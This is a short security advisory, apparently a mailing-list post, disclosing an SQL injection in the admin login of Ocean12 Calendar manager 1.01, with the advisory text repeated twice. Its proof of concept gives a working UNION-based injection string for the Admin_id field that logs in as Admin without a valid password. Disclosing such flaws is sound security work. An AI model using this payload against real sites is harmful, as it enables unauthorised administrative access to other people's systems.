The admin login panel suffers of an sql injection that allows anyone
to log in as Admin.
Proof of concept:
///
- Admin_id: Admin' UNION ALL SELECT id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,
id,id,id,id,id,id,i d,id FROM settings WHERE Admin_id='Admin
Admin_password: 1
///
Vendor has been contacted some weeks ago. No response received so far.
Author:
Zinho is webmaster and founder of http://www.hackerscenter.com ,
Security research portal
Secure Web Hosting Companies Reviewed:
http://www.securityforge.com/web-hosting/secure-web-hosting.asp
Hackers Center Security Group (http://www.hackerscenter.com/)
Zinho's Security Advisory
Product: Ocean12 Calendar manager 1.01
Site: www.ocean12scripts.com
The admin login panel suffers of an sql injection that allows anyone
to log in as Admin.
Proof of concept:
///
- Admin_id: Admin' UNION ALL SELECT id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,
id,id,id,id,id,id,i d,id FROM settings WHERE Admin_id='Admin
Admin_password: 1
///
Vendor has been contacted some weeks ago. No response received so far.
Author:
Zinho is webmaster and founder of http://www.hackerscenter.com ,
Security research portal
Secure Web Hosting Companies Reviewed:
http://www.securityforge.com/web-hosting/secure-web-hosting.asp
zinho-no-spam @ hackerscenter.com
[ reply ]